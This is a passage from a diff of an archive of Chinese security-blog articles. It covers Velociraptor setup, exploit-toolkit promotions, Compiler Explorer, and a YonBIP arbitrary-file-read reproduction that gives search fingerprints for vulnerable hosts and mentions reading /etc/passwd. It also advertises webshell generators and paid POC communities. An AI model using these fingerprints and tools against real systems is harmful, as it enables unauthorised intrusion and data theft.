> 4、功能强大 ——用户无需做太多额外工作即可实现其目标
> 5、快速 ——性能应快速且对资源的影响较小,同时允许在需要时管理性能
> 6、可靠 ——每个功能和工件都应按预期工作,并且相对没有错误和问题
##
**工具要求**
##
> Go v1.23.2+
> make
> gcc
> Node.js LTSv18.14.2+
##
**工具安装**
##
由于该工具基于Go开发因此我们首先需要在本地设备上安装并配置好Go v1.23.2+环境。
广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
```
git clone git clone https://github.com/Velocidex/velociraptor.git
```
```
```
然后切换到项目目录中,使用下列命令构建源码:
```
$ cd velociraptor
$ cd gui/velociraptor/
$ npm install
$ make build
$ cd ../..
$ make
$ make linux
$ make windows
```
为了在 Linux 上构建 Windows 二进制文件,您需要 mingw 工具。
在 Ubuntu 上,这很简单:
```
$ sudo apt-get install mingw-w64-x86-64-dev gcc-mingw-w64-x86-64 gcc-mingw-w64
```
```
```
**工具使用**
##
### 快速启动
****```
$ velociraptor gui
```
这将启动 GUI、前端和本地客户端。
您可以像往常一样从客户端(仅在您自己的机器上运行)收集工件。
###
### 本地运行 Velociraptor
Velociraptor 也可用作本地分类工具。您可以使用 GUI 创建一个独立的本地收集器:
> 1、按上述方法启动 GUI ( velociraptor gui)。
> 2、选择Server Artifacts侧边栏菜单然后Build Collector。
> 3、选择并配置您想要收集的工件然后选择选项Uploaded Files并下载您的自定义收集器。
##
**许可证协议**
##
本项目的开发与发布遵循
GNU AFFERO GPL v3
开源许可协议。
##
**项目地址**
##
**Velociraptor**
https://github.com/Velocidex/velociraptor
FreeBuf粉丝交流群招新啦
在这里,拓宽网安边界
甲方安全建设干货;
乙方最新技术理念;
全球最新的网络安全资讯;
群内不定期开启各种抽奖活动;
FreeBuf盲盒、大象公仔......
扫码添加小蜜蜂微信回复「加群」,申请加入群聊
![](https://mmbiz.qpic.cn/mmbiz_jpg/qq5rfBadR3ich6ibqlfxbwaJlDyErKpzvETedBHPS9tGHfSKMCEZcuGq1U1mylY7pCEvJD9w60pWp7NzDjmM2BlQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/oQ6bDiaGhdyodyXHMOVT6w8DobNKYuiaE7OzFMbpar0icHmzxjMvI2ACxFql4Wbu2CfOZeadq1WicJbib6FqTyxEx6Q/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ61icYlLmBLDpdYEZ7nIzpGovpHjtxITB6ibiaC3R5hoibVkQsVLQfdK57w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&retryload=2&tp=webp "")
> https://docs.velociraptor.app/
>
>
>
>
>
>
>
>
>
>
>
>
>
>
![](https://mmbiz.qpic.cn/mmbiz_png/qq5rfBadR3icEEJemUSFlfufMicpZeRJZJ7JfyOicficFrgrD4BHnIMtgCpBbsSUBsQ0N7pHC7YpU8BrZWWwMMghoQ/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302087&idx=1&sn=29d91904d6471c4b09f4e574ba18a9b2&chksm=bd1c3a4c8a6bb35aa4ddffc0f3e2e6dad475257be18f96f5150c4e948b492f32b1911a6ea435&token=21436342&lang=zh_CN&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651302006&idx=1&sn=18f06c456804659378cf23a5c474e775&scene=21#wechat_redirect)
[](https://mp.weixin.qq.com/s?__biz=MjM5NjA0NjgyMA==&mid=2651253272&idx=1&sn=82468d927062b7427e3ca8a912cb2dc7&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_gif/qq5rfBadR3icF8RMnJbsqatMibR6OicVrUDaz0fyxNtBDpPlLfibJZILzHQcwaKkb4ia57xAShIJfQ54HjOG1oPXBew/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp "")

View File

@ -0,0 +1,50 @@
# VulToolsKit一把梭漏洞Exploit合集
原创 白帽学子 白帽学子 2024-11-16 00:11
最近工作上需要做一些网络安全漏洞利用的测试以确保公司系统的安全性。在这个过程中我发现了一个很实用的开源网络安全工具合集——VulToolsKit V1.1。
这个工具合集包含了各种综合漏洞利用工具涵盖了海康威视、大华、Nacos、Vcenter等多种系统并且还有针对Fastjson、Struts2、Thinkphp等框架的漏洞检测工具。使用起来非常方便而且更新了一些工具和新增了一些功能让安全测试更加高效。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/LYy9xnADcdjP2GS1micvmPAavXbM1zJiaf0PaNRZ6QIiagffbNEAReqOqR0XndsI3ItgZgaWCTMhpQDlfvdDGGhnw/640?wx_fmt=jpeg "")
当然,在使用工具进行安全测试时,我们也需要注意一些事项,以确保测试的合法性和安全性。首先,我们应该获得授权并得到相关部门的同意,遵守公司的安全政策和流程。其次,使用工具时要谨慎操作,避免对系统造成损害或泄露敏感信息。
想要获取工具的小伙伴可以直接**拉至文章末尾**
我们来提取并讨论上述工具描述中涉及的网络安全关键技术点:
1、漏洞Exploit合集
- VulToolsKit 涵盖了多种系统和框架的漏洞利用工具包括海康威视、大华、Fastjson、Struts2等。这些工具帮助安全团队快速检测系统中存在的漏洞并进行利用测试。通过使用漏洞利用工具可以有效评估系统的安全性并及时修复潜在的漏洞。
2、更新和维护
- 保持漏洞利用工具合集的更新是至关重要的。随着新的漏洞不断被发现,及时更新工具集中的漏洞利用工具,以确保能够应对最新的安全威胁。定期维护工具集,删除过时或不再使用的工具,也有助于提升安全测试的效率和准确性。。
3、合法性和合规性
- 在进行安全测试时,必须遵守公司的安全政策和流程,获得相关部门的授权和同意。严格遵守当地法律法规,确保测试行为合法合规。同时,避免对系统造成未经授权的损害或泄露敏感信息,保护系统和用户的安全。。
4、安全测试和漏洞扫描
- 除了使用漏洞利用工具进行测试,定期进行安全测试和漏洞扫描也是至关重要的。通过全面的安全测试和漏洞扫描,可以及时发现系统中存在的漏洞,并采取相应的措施加以修复,提高系统的安全性。。
5、安全意识培训
- 除了工具和技术,安全意识培训也是至关重要的一环。通过为员工提供网络安全意识培训,使他们了解常见的网络安全威胁和防范措施,从而减少人为因素造成的安全漏洞。。
**下载链接**
https://github.com/onewinner/VulToolsKit
![](https://mmbiz.qpic.cn/sz_mmbiz_gif/LYy9xnADcdhic61NkXCWKufScrUrmmsG8tztWD8fDRiatPUaljxxpKc1PpnYNFjPibU5FwJmcuO4mZoQg5aXsAcog/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白名单。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与本公众号无关。

View File

@ -0,0 +1,88 @@
# compiler explorer 轻松从汇编角度理解代码
进击的HACK 2024-11-15 23:55
## 介绍
compiler explorer 是一个交互式编译探索网站。用C、c++、c#、f#、Rust、Go、D、Haskell、Swift、Pascal、ispc、Python、Java或其他30多种支持的语言组件编辑代码并查看代码在实时编译后的样子。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/DuibU3GqmxVmRsdItbBVRKegNHicHQvAHDdZsGpLVU7touSU1AU1twHTfRjG3Vu5aUh0RnPPllfVUhs4qdWF5QYQ/640?wx_fmt=png&wxfrom=13 "")
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途给予盈利等目的,否则后果自行承担!
![](https://mmbiz.qpic.cn/sz_mmbiz_png/9zYJrD2VibHmqgf4y9Bqh9nDynW5fHvgbgkSGAfRboFPuCGjVoC3qMl6wlFucsx3Y3jt4gibQgZ6LxpoozE0Tdow/640?wx_fmt=png&wxfrom=13 "")
截止目前star 16.4k
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ibbeRmUUpYSZUMQVZfaGRiaYv4bia29tgK1ePDZcD1woiaR6G4CPNLHBYkg/640?wx_fmt=png&from=appmsg "")
### 优点
有在线版国内可这直接访问 https://godbolt.org/有github开源地址可在本地搭建 https://github.com/compiler-explorer/compiler-explorer
可以从底层观察各个函数是如何构成的,程序是如何运行的。
C、C++、Java、Python都是高级语言它们为了方便我们人理解语法进行了很多人性化的操作方便上手和理解。但随着时间推移用的多了项目复杂后我们可能会变得疑惑这么写和那么些有什么区别为什么这么写有问题。
有些东西在高级语言上看不同的东西其实在CPU看来是没有区别的。
比如 int i 和 int* p在汇编代码层次他们并没有区别都是给一个栈地址赋值。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ib1dF5SRbRqXib896F63v4icY0DCw6KsKgkb6Y104QKtIHqCT6kDJlRibbQ/640?wx_fmt=png&from=appmsg "")
对于想要入门逆向的人来说,用 compiler explorer 来了解高级语言和汇编之间的对应关系,为后续逆向汇编,从汇编反编译成高级语言也很有帮助。
案例下面都是支持的语言https://github.com/compiler-explorer/compiler-explorer/tree/main/examples
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ibxOW2DM65WGic85ppVNBQuNZu5Fpfah6OsIclQAUVKdTz2ia5tIcwA8FQ/640?wx_fmt=png&from=appmsg "")
推荐一本书《CPU眼里的C/C++》,微信读书上也有
作者根据 compiler explorer 工具分析了C/C++当中遇到的常见指令比如指针变量和一般变量的区别goto和if、for、while的区别。从底层的视角看往往能解答很多我们在高级语言中看到的代码的疑惑。
让我印象最深刻的时候,是看 goto 和 for 的区别这在C语言中是两个不同的指令但在汇编层次我们用 goto 构造指定的代码然后到了CPU验证汇编指令是没有任何区别的。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ib652RRZPNlxgogV59fm5gzfwxCNCnM2kqOHyUzZWqzMIZib55Kt4IeuA/640?wx_fmt=png&from=appmsg "")
还有就是 i++ 和 ++i 的区别。如果是在大学学过C语言参加过考试的一定会见过对这两种区别的考核问最后的结果是多少。从C语言上看可能不明所以但到了汇编具体过程就一目了然。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/a1BOUvqnbriaaeH06JQjG2Dh0mz7d6Q4ibvVicJibeR3vInwD69fNz3IBz5kAVKUQyroCiaHBuh6Z23iaGskbN3MYTpA/640?wx_fmt=png&from=appmsg "")
往期推荐
[基于flutter的Android vpn代理工具](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486777&idx=1&sn=9c0144199ee718665d6bd790bfb1ee26&chksm=c150aad2f62723c4c2ecbcb94e2d7edbcf4064074d512b96620401dfe59e692ed136406b9dfe&scene=21#wechat_redirect)
[用友漏洞一键探测利用](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486765&idx=1&sn=491b37f45c408d9dee05bff7e18a5173&chksm=c150aac6f62723d0ce47ddd18c39fc24525a39be5d9032bf0bdd6a565c4503fd616e39ee6831&scene=21#wechat_redirect)
[Jar Obfuscator - 图形化 JAR/CLASS 字节码混淆工具](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486687&idx=1&sn=bd93740fbab2f192142c3c56ee3c3074&chksm=c150ab34f62722221c32a6cd3b9e051fe0f7383d8c7fae763d428b8a117d61eacd43bbe01428&scene=21#wechat_redirect)
[降低js逆向分析难度的油猴脚本](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486673&idx=1&sn=d7ca2ae0861850d4807ff558468c79ba&chksm=c150ab3af627222c68566213b34cbcdbe0ca008bf01303c539364ae906259f1490d3cab3d265&scene=21#wechat_redirect)
[简单绕过 IOS应用 frida检测](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486561&idx=1&sn=6582b889e69674b5bfc7c817ec7ce2b3&chksm=c150ab8af627229c4fa75be0bc1f27e24aef5a51059fb88b7e6de9e0bf33f93aeaa3479a0294&scene=21#wechat_redirect)
[burp插件 | 自动丢弃不需要的http数据包](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486478&idx=1&sn=435438f1416fe0ab5345bb7f2be38354&chksm=c150abe5f62722f38e7282c061f587c6dd9be835cf25d2ebe15925a381c370efab48ffc05b24&scene=21#wechat_redirect)
[轻松入门frida n种过app特征检测办法之一](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486441&idx=1&sn=d3ca56d7bb74111768ad6450ef567589&chksm=c150ac02f627251487e69e23f91ae5556b76ea1e28d63aebe5e62bb79ada5603e97f5453e021&scene=21#wechat_redirect)
[小技巧 | Proxifier使用Chain实现多级代理](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486353&idx=1&sn=1376103e17556115de4ee25fa40dd8e7&chksm=c150ac7af627256c464d4e981bb3caa42e747646ccc765ae2319a19260be973dbfec29e116ee&scene=21#wechat_redirect)
[SpringBoot jasypt 配置文件/属性ENC加密](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486338&idx=1&sn=dbfdeacd4b8a7698f9666e8ed3e8ac9e&chksm=c150ac69f627257ff376a05283e4d101d45dad4e3307f8722c47df3b91107bab38410a32bb78&scene=21#wechat_redirect)
[Databasetools 一款用Go语言编写的数据库自动化提权工具](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486295&idx=1&sn=396bbb6655376fcb2cbd32d33bf62187&chksm=c150acbcf62725aa1442f15a872db0a7944e6dff2b55e7c1409e0f49500ab31dca19d7eda1da&scene=21#wechat_redirect)
[在混淆的so中寻找sign签名函数](http://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486092&idx=1&sn=1337e6907b7f0643a3dd361d1b0bdb35&chksm=c150ad67f62724717af1c95f6c45951454ce2fb1c033a7bb366cebd18f41d7775b3fd8ff2d18&scene=21#wechat_redirect)

View File

@ -0,0 +1,135 @@
# 【漏洞复现】用友YonBIP高级版存在任意文件读取漏洞
xiachuchunmo 银遁安全团队 2024-11-16 00:00
**需要EDU SRC邀请码的师傅可以私聊后台免费赠送EDU SRC邀请码邀请码管够**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**漏洞简介**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**YonBIP用友商业创新平台是用友在数字经济时代面向成长型、大型企业及巨型企业融合了先进且高可用技术平台和公共与关键商业应用与服务支撑和运行客户的商业创新业务创新、管理变革并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版yonbiplogin存在任意文件读取漏洞**
****
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**资产详情**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
```
web.body="/nccloud/resources/uap/rbac/login/main/index.html"
title="YonBIP" || title="数字化工作台"
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5icqCxIIodOjYfQgwlrzoc2K50ibUC9dNsoQg5uhoNk6SwzZNcGniaRWzuwMn5rlXh8CXUz6ibGghtklw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5icqCxIIodOjYfQgwlrzoc2K1IOAk6tB6DOtjzj7asAUY8oru09icsGWk2RWrvnzMhIlpf8iawiaViaPjg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**漏洞复现**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**读取/etc/passwd文件测试**
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5icqCxIIodOjYfQgwlrzoc2KUpN8wkj6mfdVTVTFJB4FdVy7iaMDmyYuq5CxJOaV4yhUhsjiaq0ahE7A/640?wx_fmt=png&from=appmsg "")
****
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**Nuclei测试**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx59l5tmRaic1icJ8rTpS7iaibXsem4QVIKr4FH0dFjvBeEXhR7zjofDsBvvxKeBqRia2Pc85ytIibjNBiax4g/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**圈子介绍**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
质量漏洞利用工具分享社区每天至少更新一个0Day/Nday/1day及对应漏洞的批量利用工具团队内部POC分享星球不定时更新内外网攻防渗透技巧以及最新学习研究成果等。
如果师傅还是新手内部的交流群有很多行业老师傅可以为你解答学习上的疑惑内部分享的POC可以助你在Edu和补天等平台获得一定的排名。
如果师傅已经
是老手了有一个高质量的LD库也能为你的工作提高极大的效率实战或者攻防中有需要的Day我们也可以通过自己的途径帮你去寻找。
**【圈子服务】**
1一年至少365+漏洞Poc及对应漏洞批量利用工具
2Fofa永久高级会员
324HVV内推途径
4Cmd5解密各种漏洞利用工具及后续更新渗透工具、文档资源分享
5内部漏洞
库情报分享
目前已有2000+
poc会定期更新包括部分未公开0/1day
6加入内部微信群认识更多的行业朋友群里有100+C**D通用证书师傅遇到任何技术问题都可以进行快速提问、讨论交流
圈子目前价格为**129元**
**(交个朋友啦!)**
现在星球有近900+位师傅相信并选择加入我们人数满1000
**涨价至149**,圈子每天都会更新内容。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/yeJvia5dNx5ibmJXuUnaww610JyW2aMD7XyghxoOEL12QTuKPMtygJ7abCibjickyRUpBPDf52hoXPRu3nWEmjzt5A/640?wx_fmt=jpeg&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**圈子近期更新LD库**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ib2O29UeBntrAgS16oXwLZvdELfGVX4sNVxPSiatCrY9NMx1M47giajq1iayjibDHo3axOViaY9L4ovZ5g/640?wx_fmt=png&from=appmsg "")
**每篇文章均有详细且完整WriteUp**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/yeJvia5dNx5ibK7Dv4GdXpIuKGmLtjmiaeQuz0vbaPubOpv3oWAehI3Pr5flA7KQSUWtKIyycZezdAxmic5rpy2tHw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**星球提供免费F**a**![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ic3icibHW6nDoAAoX9Spv9mREyEWTD0kRZWwApI2LKZDlqDfFj0Hnbja85ppeKPty1oOKFD80G5iadWQ/640?wx_fmt=png&from=appmsg "")
**C**D通用证书********一起愉快的刷分**![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibz6ibFL4b8QBThc3t0ok0Gb7jsseWcrYsxNbv9qyQ0uhDib7TkUcLIIos2iaYlzL6TcF3ia2Rric1EH1g/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ickvP43lKosLxs8SB5kCSQQEP05NRM08qqN1YIrU1QF8ILRniaF4Vu2jbHhTypliczTnEuK5TXobk9A/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**免责声明**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/mmbiz_gif/HVNK6rZ71oofHnCicjcYq2y5pSeBUgibJg8K4djZgn6iaWb6NGmqxIhX2oPlRmGe6Yk0xBODwnibFF8XCjxhEV3K7w/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

View File

@ -1,5 +1,5 @@
# 【漏洞预警】 易宝OA-GetProductInv SQL注入漏洞
thelostworld 2024-11-15 20:24
thelostworld 2024-11-16 09:10
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看)
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -1,5 +1,5 @@
# 【漏洞预警】 用友BIP 数据库配置信息泄露
thelostworld 2024-11-15 20:24
thelostworld 2024-11-16 09:10
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看)
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,59 @@
# 一款java漏洞集合工具
pureqh 夜组安全 2024-11-16 04:01
免责声明
由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把
**夜组安全**
“**设为星标**
”,
否则可能就看不到了啦!
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icZ1W9s2Jp2Xvvlzc5lra8XdgLYGCfX5ooaMiaUJy4vKvStTngQp4122jauXltltcCuYib5WBBdaXu5dh91dGvibyQ/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**01**
**工具介绍**
一款java漏洞集合工具
包含Struts2、Fastjson、Weblogicxml、Shiro、Log4j、Jboss、SpringCloud、等漏洞检测利用模块及免杀webshell生成模块 Bypass、以及一些小工具模块由于图形化比较简明易懂所以也不需要使用说明吧 。
本项目的部分payload进行了一些混淆具备一定过waf能力有空会更新所有的payload。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/icZ1W9s2Jp2XRr1WGB0jCkb7yoWJg7YRduYcPfnYCUibDdmkyMg3dou0VdZ5PrSwY5eJXp0MKT1ebawcmagF3ySg/640?wx_fmt=png "")
**02**
**工具下载**
**点击关注下方名片****进入公众号**
**回复关键字【241116****】获取**
**下载链接**
**03**
**往期精彩**
[ 一款集成高危漏洞exp的实用性工具 ](http://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492694&idx=1&sn=593e032dc17a72a4ca4250d4a3f210f1&chksm=c36ba0aef41c29b832e8f14aafe90179de166338058ad1d6096d5b9f956e771a308d9824db65&scene=21#wechat_redirect)
[ 飞企互联平台一键漏洞探测工具,支持单 url 以及批量探测 ](http://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492693&idx=1&sn=8851d74c488cd340383f0ee3e81e6b10&chksm=c36ba0adf41c29bbc7c735e4e1d186c6f0803f60c81337816df768810e0f3ac9251155ff9ab5&scene=21#wechat_redirect)
[ 一款常规的渗透攻防武器库! ](http://mp.weixin.qq.com/s?__biz=Mzk0ODM0NDIxNQ==&mid=2247492676&idx=1&sn=aa23e6c95b94fd25c4421d89147eb170&chksm=c36ba0bcf41c29aa7a9e655bc743e19d0c2397e61779c49bf10a40c73cfc4bfc2c0b9c6767ef&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_png/OAmMqjhMehrtxRQaYnbrvafmXHe0AwWLr2mdZxcg9wia7gVTfBbpfT6kR2xkjzsZ6bTTu5YCbytuoshPcddfsNg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1&random=0.8399406679299557 "")

View File

@ -0,0 +1,50 @@
# 建了个SRC专项漏洞知识库
Z2O安全攻防 2024-11-16 12:30
建立了一个
src专项圈子内容包含**src漏洞知识库**、**src挖掘技巧**、**src视频教程**等,一起学习赚赏金技巧,以及专属微信群一起挖洞
圈子专注于更新src相关
```
1、维护更新src专项漏洞知识库包含原理、挖掘技巧、实战案例
2、分享src优质视频课程
3、分享src挖掘技巧tips
4、小群一起挖洞
```
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOABrvjQvw6cnCXlwS05xyzHjx9JgU7j83aReoqqUbdpiaMX2HeudxqYg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuY813zmiaXibeTuHFXd8WtJAOXg868PqXyjsACp9LhuEeyfB2kTZVOt5Pz48txg7ueRUvDdeefTNKdg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuYgNUapJqQxicbYTJoohoBK32iat5p76xlsgd6bdhZsdAgtNzPEv9CEOh96qgHK3ibHHBa4kRibjQeuibw/640?wx_fmt=jpeg "")
图片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKuYrUoo5XZpxN9Inq87ic71D6aUeMdaWrKXgYYia2On8nMA7bqWDySa8odAq1a0kkp3WFgf0Zp0Eut0A/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuZDDDv3NsbJDuSicLzBbwVDCPFgbmiaJ4ibf4LRgafQDdYodOgakdpbU1H6XfFQCL81VTudGBv2WniaDA/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "null")
图片
![](https://mmbiz.qpic.cn/sz_mmbiz_png/h8P1KUHOKub5zKpgA0HmT6klBJg9IugIx3z6YtXqmOkmp18nLD3bpyy8w4daHlAWQn4HiauibfBAk0mrh2qNlY8A/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
图片
